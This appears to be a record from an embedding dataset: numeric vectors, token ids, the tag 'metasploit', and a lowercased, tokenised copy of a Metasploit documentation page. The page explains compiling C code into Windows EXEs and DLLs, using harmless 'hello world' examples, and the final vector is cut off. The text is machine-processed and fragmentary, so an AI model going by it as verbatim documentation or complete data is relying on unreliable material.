-0.1750171184539795, -0.037858746945858, -0.07029546052217484, 0.26980912685394287, -0.32687830924987793, 0.31842970848083496, -0.5371429920196533, 0.6007258892059326, 0.1929888129234314, -0.23346979916095734, -0.1148325651884079, 0.24599255621433258, -0.09411013871431351, -0.03565573692321777, 0.23486623167991638, -0.18247413635253906, -1.2715411186218262, -0.3196125626564026, 0.1879539042711258, 0.6419914364814758, 0.8530410528182983, 0.007696632295846939, 0.836209237575531, -0.4889039695262909, 0.15082380175590515, -0.3886909484863281, -0.21314048767089844, -0.5872176885604858, -0.8745591044425964, 0.5739636421203613, -0.4487963318824768, -0.7131763100624084, -0.17343944311141968, -0.0420866534113884, 0.4796385169029236, -0.5809897780418396, 0.629859447479248, -0.1840270459651947, 0.5807380080223083, -0.22208824753761292, 0.516526997089386, -0.7271565198898315, -0.44192662835121155, 0.033502429723739624, 0.6435174942016602, -0.05720655620098114, 0.33747538924217224, -0.14784492552280426, 0.1373010277748108, 0.36128929257392883, 0.521081805229187, -0.6236522197723389, -0.6701177954673767, -0.06628037989139557, -0.13644573092460632, -0.20702983438968658, -0.27338504791259766, -0.14579571783542633, 0.6163220405578613, 0.6920493245124817, 0.2581346333026886, -0.011954061686992645, -0.18675383925437927, 0.7314239144325256, -0.5139908194541931, 0.6475877165794373, -0.21677826344966888, -0.4316938519477844, -0.38587695360183716, -0.3379914164543152, 0.4408813714981079, -0.17867103219032288, -0.18222802877426147, 0.2098200023174286, 0.02327125519514084, -0.02492506243288517, 0.1836777925491333, -0.6088956594467163, -0.24996887147426605, 0.2227960228919983, 0.3726515471935272, 0.4627322256565094, 0.44204071164131165, 0.1236729770898819, -0.4172460734844208, -0.007566350046545267, 1.5474169254302979, -0.4418567717075348, 0.7069588899612427, -0.47502782940864563, -0.34938520193099976, -0.8673455715179443, -0.08720572292804718, 0.5302596092224121, -0.09540602564811707, 0.4877331256866455, 0.5401957631111145, 0.2080306112766266, -0.2785017788410187, -0.5310901999473572, 0.11757864058017731, -0.09243419021368027, 0.5615845322608948, -0.0892973318696022, 0.21781527996063232, 0.09061189740896225, 0.40666717290878296, -0.5384051203727722, 0.6466049551963806, -0.444898396730423, -0.5640241503715515, -0.5499798655509949, -0.6388333439826965, 0.33277779817581177, -0.4355712831020355, -0.06818979978561401, -0.5596798062324524, 0.42054975032806396, 0.4644118845462799, 0.16492633521556854, -0.12784124910831451, 0.0820930078625679, 0.6054373979568481, 0.5033095479011536, 0.6715788841247559, 0.7358786463737488, 1.0048000812530518, -0.36506950855255127, -0.029964378103613853, 0.48895686864852905, -0.4103061854839325, -0.45540356636047363, -0.7923758029937744, -0.13072173297405243, 1.042485237121582, -0.5762259364128113, 0.6110047698020935, -0.7237309217453003, 0.010015230625867844, -1.212525486946106, 0.20957164466381073, -0.3220512866973877, -0.4321141541004181, -0.3727240562438965, 0.19647641479969025, 0.15417909622192383, 0.01851631887257099, -0.2836650609970093, -0.40395423769950867, 0.5049296617507935, 0.5532251000404358, -0.39210283756256104, 0.26026150584220886, 0.18747903406620026, 0.5970709919929504, -0.3224464952945709, -0.06367423385381699, 0.012704813852906227, -0.015317453071475029, 0.1700775921344757, -0.15948960185050964, 0.32934674620628357, 0.47343695163726807, -0.48805177211761475, 0.7530122995376587, 0.9638386964797974, 0.00926115456968546, -0.41706347465515137, 0.4565970301628113, 0.21745221316814423, 0.9453321099281311, 0.22785869240760803, 0.6460506916046143, -0.1846156120300293, 0.36263707280158997, 0.0651448518037796, 0.5071263909339905, 0.49920201301574707, 0.8353530168533325, 0.6601697206497192, -0.14192301034927368, -0.10776443779468536, 0.46514615416526794, -0.25260186195373535, -0.10722985863685608, 0.2819354832172394, 0.0052864509634673595, 0.887488603591919, -0.7522948384284973, -0.08090567588806152, 0.24862012267112732, 0.16081750392913818, 0.4304425120353699, -0.3925963342189789, 0.775448203086853, 0.01745927706360817, 0.32854998111724854, -0.7024374604225159, -0.537704586982727, 0.7033429145812988, 0.8873705267906189, -1.9005944728851318, 0.0863751545548439, -0.06321150064468384, 0.8563358187675476, -0.4624937176704407, -0.14801505208015442, 0.3347074091434479, 0.6853257417678833, 0.45909154415130615, -0.0049512917175889015, -0.17478825151920319, -0.7306514978408813, -0.7263228297233582, -0.7152573466300964, -0.8342466950416565, 0.5970041155815125, -0.8998031616210938, 0.13602621853351593, 0.6908413171768188, -0.857825517654419, -0.17481419444084167, -0.5431428551673889, 0.5035353302955627, -0.25372329354286194, 0.3016330301761627, 0.5459278225898743, 0.5771617889404297, -0.22307643294334412, -1.1832079887390137, 0.6249282956123352, -0.35409948229789734, 0.4057679772377014, -0.2332892268896103, 0.32941776514053345, 0.013461415655910969, -0.026169633492827415, -0.29261189699172974, -0.36623701453208923, -0.7244806885719299, 1.000697135925293, -0.22891177237033844, 0.21468660235404968, -0.7723132967948914, -0.16345246136188507, -0.23463262617588043, -0.1839340478181839, -0.025478335097432137, 0.6117202043533325, 0.5815587043762207, -0.2349950522184372, 0.7309213280677795, -0.04015864059329033, -0.22367213666439056, 0.8226677179336548, 0.42260029911994934, 0.2345155030488968, -0.9023237228393555, 1.3940727710723877, 0.5365080237388611, 0.3174459934234619, -0.5286391973495483, 0.21593168377876282, -0.5497586131095886, -0.025412647053599358, 0.22135643661022186, -0.40412381291389465, -0.4681856036186218, 0.6892408132553101, -0.32402679324150085, -1.3821372985839844, 0.4199211597442627, 0.22789640724658966, -0.45154082775115967, 0.24754217267036438, -0.6815394759178162, 0.21362002193927765, 0.2853577733039856, 1.0339769124984741, -0.23952148854732513, -0.42859843373298645, 0.007996296510100365, 0.1979663074016571, -0.20348820090293884, -0.49103841185569763, 0.6587231159210205, -0.20310655236244202, 0.16828081011772156, -0.8125512003898621, -0.42341479659080505, 0.1273355334997177, 0.004746847786009312, 0.19771048426628113, 0.3842977285385132, 0.019479811191558838, -0.018527211621403694, 0.10405705124139786, 1.0342223644256592, 0.4878038763999939, -0.5296875238418579, 0.5211141705513, 0.2574099004268646, 0.09259176254272461, 0.23217558860778809, 0.3132797181606293, -0.6584770083427429, -0.4643798768520355, 0.26875102519989014, -0.21690566837787628, -0.18747013807296753, 1.0883203744888306, 0.5367667078971863, -0.3397670090198517, 0.6197240948677063, 0.05958819389343262, -0.18431803584098816, 1.3839151859283447, -0.2094511240720749, -0.27668139338493347, 1.3141148090362549, 0.05975973606109619, 1.2377617359161377, -1.37639319896698, -0.11771237850189209, -0.09227727353572845, 0.06542698293924332, -0.017603745684027672, -0.1378447264432907, 0.06208562105894089, 0.10040632635354996, -0.7127287983894348, -0.7372545599937439, -0.4496496319770813, 0.04726707190275192, -0.10391585528850555, 0.07877295464277267, -0.531058669090271, -1.3703511953353882, -0.3255600035190582, 0.43081775307655334, 0.2979143261909485, 1.2175369262695312, -0.0440409816801548, 0.17815189063549042, 0.14090344309806824, 0.4313162863254547, 0.4498395323753357, -0.4892767369747162, 0.02465229108929634, -0.2600305676460266, 1.34357488155365, -0.17647306621074677, 0.06316552311182022, -0.9729117751121521, 0.11318989098072052, -0.07428991049528122, 0.48001641035079956, -0.5823938250541687, 0.16366593539714813, -0.15478621423244476, 0.5597310662269592, 0.38594508171081543, 0.3358263075351715, -0.12139048427343369, -0.8349518179893494, -0.21320077776908875, 0.5178422927856445, 1.0597279071807861, -0.4749022126197815, -0.07800370454788208, 0.2487020194530487, -0.5429391264915466, 0.6937522292137146, -0.21731211245059967, -0.43691983819007874, -0.4315609633922577, -1.488947868347168, -1.1446545124053955, 0.9567795395851135, 0.8212330937385559, 0.32489922642707825, 0.46316811442375183, -0.554434061050415, 0.7087956070899963, 0.025395212695002556, 0.04645039141178131, 0.7883660793304443, -0.6010811924934387, -0.10922416299581528, 0.4000399708747864, 0.29687753319740295, 0.023745663464069366, -0.06516705453395844, 0.27560555934906006, -1.0632600784301758, 0.3937658369541168, -0.40549588203430176, -0.16406403481960297, -0.44844695925712585, 0.1924494057893753, -0.15139243006706238, 0.3707793056964874, 0.1544264853000641, 0.07358051836490631, -0.3438728153705597, 0.23945491015911102, -0.3108782470226288, -0.2717186212539673, 0.6762152910232544, -0.7170554399490356, -0.12823401391506195, 0.7947985529899597, 0.15622267127037048, -0.5114580392837524, 0.35134610533714294, -0.018530886620283127, -0.6822532415390015, 0.16694346070289612, -0.2597944140434265, 0.2809623181819916, 0.0902647078037262, -0.5980769991874695, -0.39782196283340454, -0.5337810516357422, 1.0085599422454834, 0.6029046773910522, -0.4305190443992615, -0.059319108724594116, -0.0583275705575943, 0.22306425869464874, 0.21939954161643982, 0.022717442363500595, -0.21267914772033691, -0.039430271834135056, -0.23314493894577026, 0.3449648320674896, -0.2816646993160248, -0.29070937633514404, 0.053704772144556046, -0.005817904602736235, 0.3191222548484802, 0.8519104719161987, 0.8418892025947571, 0.6662939786911011, 0.5634947419166565, -0.6273090839385986, -0.06288036704063416, -0.3652748465538025, 0.5382319688796997, -0.9570717215538025, 0.642460823059082, -0.0830705314874649, 0.5349383354187012, -0.09021881967782974, 0.45102885365486145, -0.8733291625976562, -0.21543821692466736, 0.262837678194046, 0.23415325582027435, 0.36975881457328796, -0.4473366439342499, -0.4628373384475708, -0.15891911089420319, 1.0129412412643433, -0.6057835817337036, 0.2940213084220886, 0.3509017825126648, -0.5119482278823853, 0.6573427319526672, -0.2937682569026947, -0.872866153717041, 0.015151169151067734, -0.4951753616333008, -0.022601468488574028, -0.24213464558124542, -0.7378349900245667, -0.24361583590507507, -0.9929500222206116, -0.21953630447387695, 0.2748301923274994, 0.40461304783821106, -0.7909253239631653, -0.2656000554561615, -0.6780455112457275, -0.014730880036950111, -1.5662243366241455, -0.6821013689041138, 0.5281854271888733, 0.2439073771238327, 0.6557629108428955, 1.3490763902664185, -0.4865890145301819, 0.13513143360614777, 0.12019087374210358, 0.23994022607803345, 0.5668120384216309, 0.9911316633224487, -1.1905728578567505, -0.9524422287940979, 0.6618384122848511, -0.39505210518836975, -0.8055409789085388, 0.10893581062555313, -0.8887670636177063, 0.46767786145210266, -0.4557785987854004, -0.046773213893175125, -0.5227283835411072, 0.09458027780056, -0.903135359287262, 0.7302983403205872, -0.22261077165603638, -0.3239762783050537, 0.5455445051193237, -0.9674912095069885, 0.1380191147327423, -0.27161097526550293, 0.21432001888751984, -0.12256541848182678, -0.18325501680374146, -0.5955789089202881, -0.5997962951660156, 0.12830616533756256, -0.19965636730194092, -0.09223667532205582, -0.3294289708137512, -0.4696413278579712, 0.3658720850944519, -0.43805232644081116, 0.5420997142791748, 1.0511568784713745, -0.12160461395978928, 0.34675103425979614, -0.2336575984954834, 0.6785188317298889, 0.8916298747062683, -0.960576593875885, -0.05464312434196472, 0.2526476979255676, -0.2750314772129059, 0.42458346486091614, -0.49272361397743225, -0.39318451285362244, -0.39116379618644714, 0.06481169164180756, 1.2433502674102783, -0.5232475399971008, 0.6900167465209961, 0.027027195319533348, -0.8811489343643188, -0.4308088421821594, 0.45144495368003845, -0.6081637144088745, 0.1752123385667801, 0.6859171390533447, 0.4334581792354584, 0.2832822799682617, 0.9669185876846313, -1.095272421836853, -0.2589470148086548, -0.24480517208576202, 1.1489075422286987, 0.34054720401763916, -0.3719157576560974, 0.8074833154678345, 0.27206867933273315, -0.9049083590507507, -0.9671679139137268, -0.8770484328269958, -0.04760618507862091, -0.36445391178131104, -0.5120086669921875, 0.16320987045764923, 0.21561729907989502, -0.41598281264305115, -0.3716326951980591, 0.36037418246269226, 0.1425810605287552, 0.6212399005889893, -0.053066231310367584, 0.39518216252326965, -0.4815789759159088, -0.09107034653425217, 0.8274190425872803, 0.08260271698236465, -0.21380971372127533, 0.3500075936317444, 0.44323670864105225, -0.661297619342804, 0.1375744640827179, 0.4345232844352722, -0.21856693923473358, 0.8398135900497437, -0.007950788363814354, -0.18071871995925903, 1.3182168006896973, -0.7592992782592773, 0.37088656425476074, 0.7233422994613647, -0.8986608982086182, -0.23993143439292908, -0.09038137644529343, -0.2888720631599426, 0.06281150132417679, 0.5549935698509216, -0.4255877435207367, 1.1297131776809692, 0.6338785290718079, 0.3427414000034332, 0.17515218257904053, -1.2371183633804321, -0.06980499625205994, -0.8812522888183594, -0.6553512215614319, 0.0006059179431758821, -1.1255850791931152, 0.32328659296035767, -0.2557063698768616, -1.034437894821167, -0.5903339385986328, -0.920063853263855, 0.4283221662044525, -0.23324698209762573, 0.3972970247268677, -0.6284933686256409, -0.2666444778442383, -0.43864670395851135, -0.3180003762245178, -0.9256190061569214, -0.4567837417125702, -0.7831164002418518, 0.6950715780258179, -0.6052484512329102, -0.3915477991104126, 0.13062836229801178, 0.8103389143943787, -0.13210037350654602, -0.11815307289361954, -0.8584185242652893, -0.6216710209846497, 0.17234613001346588, 0.25929680466651917, -0.40533196926116943, 1.0945017337799072, 0.5179938077926636, -0.29195868968963623, 0.25263211131095886, -0.0697946548461914, 0.4004124402999878, -0.6350477933883667, 0.3823390007019043, 0.7240892052650452, -0.07127739489078522, -0.8477638959884644, -0.18564394116401672, 0.09905565530061722, -0.8265587091445923, -0.169204980134964, 0.0711260437965393, 0.024454055353999138, -0.17781592905521393, -0.09530366212129593, 0.1664489060640335, 0.6436566710472107, -0.5959397554397583, 0.8903090357780457, -0.07096163183450699, -0.19065162539482117, 0.20089656114578247, 0.36292535066604614, 0.20415052771568298, -0.04918176680803299, 0.29115888476371765, -0.09103383868932724, 0.2410210222005844, 0.10923516750335693, -0.326421856880188, 0.06035616621375084, -0.6380749344825745, -0.11587046831846237, -0.31816303730010986, 0.1773739755153656, 0.417914479970932, -0.10063821077346802, 0.13595382869243622, -0.06362775713205338, -0.20487187802791595, 0.029427334666252136, -0.5520994067192078, -0.1430065780878067, -1.355358600616455, -0.6830959916114807, 0.2380903959274292, -1.5644279718399048, 0.031055092811584473, -0.7217021584510803, -0.5466901659965515, -0.19976688921451569, 0.6256549954414368, 0.408649206161499, 0.3767804801464081, 0.34120383858680725, 0.5839226245880127, 0.776186466217041, -0.8207683563232422, -0.7768846750259399, 0.027642598375678062, 0.8264437317848206, -0.886160135269165, -0.8399808406829834, 0.19833780825138092, 1.135911464691162, -0.6720789074897766, -0.35139545798301697, -0.18733768165111542, -0.7173084616661072, 0.6900767683982849, 0.7258222103118896, -0.16552497446537018, 0.6514250636100769, -0.38286083936691284, 0.8163407444953918, -0.5654561519622803, 0.7110655307769775, -0.7629791498184204, 0.206601083278656, 0.39106741547584534, -0.08187303692102432, 0.05405701696872711, 0.1861465722322464, 0.3910957872867584, -0.05788424611091614, 0.8438228964805603, 0.877432107925415, 0.4990732669830322, -0.24271593987941742, -0.5851109623908997, 0.5590163469314575, 0.6423887610435486, 0.8176503777503967, 0.5298385620117188, -0.5348817110061646, 0.6271998882293701, -0.004620594438165426, -0.08876579254865646, -0.09027021378278732, 0.3996204137802124, 0.23799367249011993, -0.2654055655002594, 0.714296281337738, 0.45194101333618164, -0.1455622911453247, 0.2807939350605011, -0.3492780327796936, -0.27578702569007874, -0.31312814354896545, -0.3591045141220093, -0.4804304838180542, -0.10630796104669571, 0.820048451423645, -0.6348743438720703, -0.25486963987350464, -0.5392197966575623, 0.17694836854934692, 0.4516342580318451, 0.41799771785736084, -0.30425527691841125, -0.8775576949119568, 0.8537233471870422, 0.3208637535572052, 0.5559123158454895, 0.6294357776641846, 0.27828317880630493, 0.3214462995529175, -0.33291202783584595, -0.4253349304199219, -0.6504726409912109, -0.1658097803592682, 0.472726434469223, 0.04859594628214836, -1.290442705154419, 0.006045790854841471, -0.2761657238006592, -0.3137567639350891, 0.42720943689346313, -0.18589232861995697, 0.20356711745262146, -0.4454967677593231, 0.39007750153541565, -0.4527983069419861, -0.32830628752708435, 0.382882684469223, -0.3979693353176117, 0.17488642036914825, 0.11881665885448456, -0.9020237326622009, -0.3949021100997925, 0.2993825376033783, 1.4573311805725098, -0.5379610061645508, 0.8759357929229736, 0.11986882984638214, -0.42765524983406067, 0.0655030906200409, 0.21037307381629944, -0.9848557114601135, -0.07389221340417862, -0.09033279120922089, -0.6579824686050415, -0.05976839363574982, 0.1231660321354866, -0.51804518699646, 0.30996614694595337, 0.16390582919120789, 0.040775422006845474, -0.44073039293289185, -0.34911152720451355, 0.21429967880249023, -0.7569931149482727, 0.4141331911087036, 0.9004919528961182, -0.5876626372337341, -0.14045186340808868, -1.1614553928375244, -0.6051894426345825, -0.3514691889286041, 0.2787434160709381, -0.8103083968162537, -0.03074582852423191, -0.4320162832736969, 0.03183833882212639, -0.7702990770339966, -0.5244390368461609, -0.4730697572231293, -0.41110512614250183, 0.005748888477683067, -0.3069813549518585, 0.509457528591156, 0.19039614498615265, 0.5330350399017334, 1.0108550786972046, -0.5554329752922058, 0.24887773394584656, 0.1739916354417801, 0.6890552639961243, -0.3349120020866394, 0.9214783310890198, 0.3986409306526184, 0.6741787195205688, 0.7146069407463074, -0.017651934176683426, 0.7133390307426453, -0.14256274700164795, -0.3433133661746979, -0.7469052076339722, 1.0201729536056519, -0.7071560621261597, -0.8340858221054077, 0.4381459057331085, 0.3385598659515381, -1.1036938428878784, -0.3947036564350128, -0.3095446228981018, -0.006619617342948914, -0.5387599468231201, 0.2919752299785614, -0.9106781482696533, -0.11209073662757874, -0.5130698680877686, -0.3913273215293884, -0.4322633445262909, -1.5208697319030762, 3.88806414604187, 0.7128635048866272, -0.02287011221051216, 0.5862733721733093, -0.21420180797576904, 1.0627977848052979, 0.6547028422355652, -0.3268086314201355, -0.028594929724931717, -0.5120943188667297, 0.4737483859062195, -0.20728753507137299, 0.657406747341156, 0.37236982583999634, -0.34065762162208557, 0.696860134601593, -0.8654544949531555, -0.058320339769124985, 0.11782494187355042, -0.811342179775238, -1.21623957157135, -0.14661230146884918, -0.23070015013217926, 0.10651649534702301, -0.1732662320137024, -0.10271105915307999, 0.20635215938091278, 0.49004557728767395, 0.14261320233345032, 0.013703802600502968, -0.2170804888010025, -0.11733695864677429, 1.1066060066223145, -0.5485060214996338, -1.0308669805526733, 0.33449649810791016, 0.21984966099262238, -1.019484281539917, 0.4130270481109619, 0.06613318622112274, 0.15384270250797272, -0.34367048740386963, -0.1718614101409912, -0.46671369671821594, -0.5615373849868774, 0.9525032043457031, 0.25254714488983154, 0.0692114382982254, 0.9446254372596741, -0.4694537818431854, -0.007812493946403265, -0.526359498500824, 0.5358518958091736, -1.2119711637496948, -0.6774877905845642, 0.03406761959195137, -0.38498133420944214, 0.4356434643268585, 0.778739333152771, -0.688399076461792, 0.015511680394411087, 0.5203484892845154, -0.2771168649196625, -0.2833942472934723, -0.8229037523269653, -0.18146291375160217, 0.29071131348609924, 0.7440923452377319, -0.8023184537887573, -0.8057938814163208, -0.157985657453537, -0.36630886793136597, -0.8131373524665833, -0.34005606174468994, 0.5449550151824951, 0.7561920881271362, -0.44859597086906433, 0.38584014773368835, 0.19145268201828003, -0.4174306392669678, 0.3415190279483795, 0.21702061593532562, -0.1544940322637558, 0.05560395121574402, 0.5893391966819763, 1.3324148654937744, -0.47768864035606384, 0.3231140673160553, -0.07247470319271088, 0.851140558719635, 1.0317667722702026, 1.0581690073013306, -0.003072446910664439, 0.42930281162261963, 0.21708440780639648 ]
[ 101, 2795, 1997, 8417, 19184, 2918, 21084, 2490, 22110, 2549, 2490, 1060, 2953, 2490, 5963, 2000, 2327, 102 ]
metasploit
126.txt
0
[CLS] on this pageexe exampledll exampleprintf ( ) custom headerscode randomizationmetasploit : : framework : : compiler : : windows is a wrapper of metasm specifically for compiling c code for the windows platform. the purpose of the wrapper is to support default headers, such as stdio. h, stdio. h, string. h, windows. h, or some other important headers that you might use while writing in c. exe examplec _ template = % q | # include < windows. h > int main ( void ) { lpctstr lpmessage = " hello world " ; lpctstr lptitle = " hi " ; messagebox ( null, lpmessage, lptitle, mb _ ok ) ; return 0 ; } | require'metasploit / framework / compiler / windows'# # save as an exe variable exe = metasploit : : framework : : compiler : : windows. compile _ c ( c _ template ) # # save the binary as a file metasploit : : framework : : compiler : : windows. compile _ c _ to _ file ('/ tmp / test. exe ', c _ template ) dll examplec _ template = % q | # include < windows. h > bool apientry dllmain _ _ attribute _ _ ( ( export ) ) ( hmodule hmodule, dword dwreason, lpvoid lpreserved ) { switch ( dwreason ) { case dll _ process _ attach : messagebox ( null, " hello world ", " hello ", mb _ ok ) ; break ; case dll _ thread _ attach : break ; case dll _ thread _ detach : break ; case dll _ process _ detach : break ; } return true ; } / / this will be a function in the export table int msg _ _ attribute _ _ ( ( export ) ) ( void ) { messagebox ( null, " hello world ", " hello ", mb _ ok ) ; return 0 ; } | require'metasploit / framework / compiler / windows'dll = metasploit : : framework : : compiler : : windows. compile _ c ( c _ template, : dll ) to load a dll, you can use the loadlibrary api : # include < windows. h >
[ -0.1911194920539856, -0.8574422001838684, 0.11735177040100098, 0.37716349959373474, -0.22216051816940308, -0.16520997881889343, -0.4074031114578247, 0.083796426653862, 0.23740942776203156, 0.43978452682495117, 0.13535700738430023, -0.41159453988075256, 0.4972659647464752, -0.3962441086769104, -1.0948872566223145, 0.11757047474384308, -0.4536550045013428, -0.6350884437561035, -1.5345895290374756, 0.4235365688800812, 0.07062628120183945, -0.23263224959373474, -0.9728887677192688, -0.6637111902236938, -0.5542923808097839, 0.25060397386550903, 0.7067345976829529, -0.12916447222232819, 0.9621925950050354, 0.5213105082511902, 0.3038744628429413, -0.2251943051815033, -0.24698448181152344, -0.5282698273658752, 0.22090178728103638, -0.30698996782302856, 0.5897968411445618, -0.5924471616744995, 0.3104472756385803, -0.1406802386045456, 0.4348628520965576, -0.1790289431810379, 0.2782050669193268, -1.1925495862960815, -0.6255345344543457, -1.086937427520752, 0.18609046936035156, -0.07665572315454483, 0.7661175727844238, 0.18363317847251892, 0.5097993016242981, 0.2857774496078491, 0.22484548389911652, -0.12221910059452057, -0.10215497761964798, -0.1277850866317749, -0.38235220313072205, 0.10697167366743088, -0.29237186908721924, 0.23132087290287018, -0.31311941146850586, 0.8826035857200623, -0.1611083447933197, -1.2041871547698975, -0.3121410012245178, 0.5747762322425842, -0.10007350891828537, 0.14065778255462646, -0.19344232976436615, -0.5795918703079224, 0.2720330059528351, 0.7494158148765564, -0.6197488903999329, -0.3665476143360138, -0.5782381296157837, -0.7049304842948914, 0.37615910172462463, -0.3586534261703491, -0.17197705805301666, 0.6360177993774414, -0.5157649517059326, 0.7258754968643188, 0.7294923663139343, -0.43574458360671997, -0.4568600058555603, -0.7690683007240295, 0.3828749358654022, 0.05576805770397186, -0.4277138411998749, 0.10309935361146927, 0.12592244148254395, 0.40757298469543457, -0.21027757227420807, 0.02383408322930336, 0.5930939316749573, 0.8962445855140686, -0.3209575116634369, 0.18454760313034058, -0.6233402490615845, 0.08738487958908081, 0.9992115497589111, 1.0365263223648071, 0.21502245962619781, 0.19980114698410034, -0.01238144189119339, 0.37019017338752747, 0.14173053205013275, 0.1467585414648056, -0.4436880350112915, -0.29972803592681885, 0.48826244473457336, 0.04557396098971367, 0.06285911798477173, -0.6691070795059204, 0.21221961081027985, 0.4229641854763031, 0.19136691093444824, -0.21949070692062378, -0.6228939294815063, 0.4858790338039398, 0.20876693725585938, 0.1326470822095871, 0.05510825663805008, -0.48771435022354126, 0.27596062421798706, 0.34752529859542847, 0.24362477660179138, 0.9327956438064575, -0.9177226424217224, -0.1556447595357895, -0.22307206690311432, -0.013470836915075779, 0.0780516043305397, 0.9570571184158325, -0.1197388544678688, 0.9618576169013977, 0.3671572208404541, 0.1545974761247635, 0.29353800415992737, -1.39846670627594, 0.1516817957162857, 0.5105112195014954, 0.060439035296440125, 1.5093586444854736, -0.06573431193828583, 0.019274236634373665, -0.6480647921562195, 0.16094832122325897, -0.07786537706851959, 0.6117915511131287, -0.13924525678157806, -0.09984257817268372, 0.603573203086853, -0.18353481590747833, -0.08951607346534729, 0.13285084068775177, -0.6224685311317444, 0.6819450259208679, 0.15396882593631744, -0.5638251304626465, -0.06721218675374985, 0.4948369860649109, -0.3289298713207245, 0.9254804849624634, -0.1842181235551834, 0.4460655152797699, -1.1559360027313232, 0.07090967893600464, -0.8051250576972961, -0.4157750904560089, 0.23684479296207428, -0.10687337815761566, 0.30001676082611084, 0.7248436808586121, 1.3795045614242554, 0.8407698273658752, -0.228532075881958, -0.23367054760456085, 0.37811723351478577, 0.5617185831069946, -0.1929475963115692, 0.6045712828636169, -0.22134016454219818, 1.11183500289917, -0.3784034252166748, -0.18583960831165314, 0.541729748249054, -0.49090060591697693, -0.06761928647756577, 0.09477411955595016, 0.06948961317539215, 0.21794667840003967, -0.4345504343509674, 0.642288863658905, 0.16193464398384094, 0.2531418204307556, -1.151170015335083, -0.2412889450788498, -0.006999642122536898, -1.0610178709030151, -0.11946875602006912, 0.45111528038978577, -0.3675110936164856, 0.8851075172424316, -0.20569488406181335, -0.3272267282009125, 0.5880830883979797, 0.681126594543457, 0.15730629861354828, 0.4486474394798279, 0.7581776976585388, 0.048993710428476334, -0.7825006246566772, 0.28993409872055054, 0.2925352454185486, -0.024087293073534966, -0.007887671701610088, 0.22549816966056824, -0.42696869373321533, 0.14628536999225616, -0.396199494600296, 0.8032158017158508, 0.7456845641136169, -0.18806838989257812, -0.4658183455467224, -0.525420606136322, 0.2877799868583679, 0.1290326714515686, -0.523229718208313, 0.06659126281738281, 0.15592724084854126, 0.29910409450531006, 0.5947489142417908, 1.1052358150482178, -0.3351342976093292, -0.7050329446792603, 0.6169368624687195, 0.786406934261322, -0.020673353224992752, -0.20514944195747375, -0.41782060265541077, 0.7286453247070312, 0.2922781705856323, 0.3661569654941559, 0.014373701997101307, 0.49052152037620544, 0.47716498374938965, -0.6157729029655457, 0.36171263456344604, 0.3118533492088318, -0.17457272112369537, 1.2159168720245361, 0.0712701827287674, -0.19908687472343445, -1.0877658128738403, -0.47290167212486267, 0.14055617153644562, 0.784600019454956, -0.7558606266975403, -0.6959446668624878, 0.5927342176437378, 0.07063618302345276, -1.107246994972229, -0.3696472942829132, -0.10495562106370926, 0.8818809390068054, 0.1639900803565979, 0.19160953164100647, 0.0191635824739933, -0.5050257444381714, -0.1313118040561676, -0.07064491510391235, -0.49340546131134033, -0.21780464053153992, -0.7451761364936829, 0.04113572835922241, 0.02833441086113453, -0.19463524222373962, 0.07010306417942047, -0.08637665212154388, -0.4273225963115692, 0.13781973719596863, -0.10774290561676025, 0.2400621473789215, 0.2681644856929779, -0.5886775255203247, -0.48443230986595154, -0.17313264310359955, -0.07980434596538544, 0.9281052947044373, -0.2733745276927948, -0.10023113340139389, -0.3633438050746918, -0.4464208781719208, -0.04359561204910278, 0.1810455322265625, 0.7045918703079224, -0.3649256229400635, -0.048131875693798065, -0.33200088143348694, -0.09589678794145584, -0.2433396279811859, 0.21759164333343506, -0.31937679648399353, -0.41540876030921936, 0.5576776266098022, -0.26567187905311584, -0.10432496666908264, 0.6936032176017761, 0.5759921073913574, -1.317523717880249, 0.5424250960350037, 0.2513236403465271, 0.3936661183834076, -0.9284564256668091, 0.6461784243583679, 0.13433721661567688, 0.24816545844078064, 0.006733047775924206, -0.27377849817276, -0.2029763013124466, -0.055396296083927155, -0.5634998083114624, -0.351915180683136, -0.3139580190181732, 0.891922116279602, 0.8415287733078003, -1.1514266729354858, 0.4657228887081146, -0.3719192445278168, -0.3245011568069458, -0.014314502477645874, -0.005249058827757835, 0.6830909848213196, -0.12780456244945526, 1.0261517763137817, -0.13320866227149963, -0.1144922748208046, -0.4830215573310852, -0.2829267978668213, -0.07087384909391403, -0.28299421072006226, 0.6006423830986023, 0.5733029246330261, -0.703595757484436, 0.29231366515159607, 0.8750289678573608, -0.5245298147201538, -0.07423289120197296, -0.6091739535331726, -0.11576563119888306, -0.49282512068748474, 0.24518868327140808, 0.6267985105514526, 0.1811956912279129, 0.40237802267074585, -0.6873871684074402, -0.12309092283248901, 0.3661058843135834, 0.02081088349223137, 0.18378055095672607, 0.10039887577295303, -0.21909452974796295, 0.05290043726563454, -0.37339484691619873, -0.47315776348114014, 0.3179282546043396, 0.8260719776153564, 0.2983444035053253, -0.14193689823150635, 1.4176914691925049, -0.6090463399887085, -0.5083724856376648, 0.3484657108783722, -0.5344839096069336, -0.729640543460846, 0.6053263545036316, 0.3904957175254822, 0.36082449555397034, -0.6601633429527283, -0.3972819447517395, -0.17738904058933258, 0.024443883448839188, 0.20084378123283386, -0.2605893313884735, 0.142722949385643, -0.43029898405075073, -0.5808089375495911, -0.029353464022278786, 0.04685909301042557, -0.40567973256111145, -0.258198618888855, 1.153214454650879, -0.7907382845878601, -0.5944980978965759, -0.5846409797668457, 0.6102837920188904, 1.073252558708191, 0.7488113641738892, 0.5826307535171509, 0.33121219277381897, 0.5272420048713684, 0.22957885265350342, 0.45231911540031433, -0.3119100034236908, 0.44739243388175964, 0.18166334927082062, 0.8330597281455994, -0.7281043529510498, 0.2013096958398819, -0.90338134765625, -0.02049512416124344, -0.32175004482269287, -0.03612642362713814, 0.08633522689342499, 0.09026926010847092, -0.5565599799156189, -0.4096621572971344, 0.3105045557022095, 0.3852900266647339, -0.654472827911377, -0.2212274670600891, -0.20443673431873322, 0.12294897437095642, 0.49284616112709045, -0.30934497714042664, -0.0878387987613678, -0.7317994832992554, 0.1296347826719284, 0.06452792137861252, 0.020185437053442, -0.021755965426564217, -0.4904690682888031, -0.4256002604961395, -0.3091293275356293, 0.7038652896881104, 0.6261417865753174, 0.1039830818772316, 0.041596442461013794, -1.408601999282837, -0.20104101300239563, -0.22782203555107117, -0.26286596059799194, -0.5445525646209717, -0.09732795506715775, 0.4444740414619446, 0.5560140609741211, 0.43038538098335266, -0.4888893663883209, -0.589945912361145, 0.9438203573226929, -0.45014268159866333, 0.3216518759727478, -0.3919559717178345, 0.5628833770751953, 0.34580832719802856, -0.5779919624328613, -0.42372578382492065, -0.1266145408153534, -0.6383960843086243, -0.04635043814778328, -0.8469030261039734, 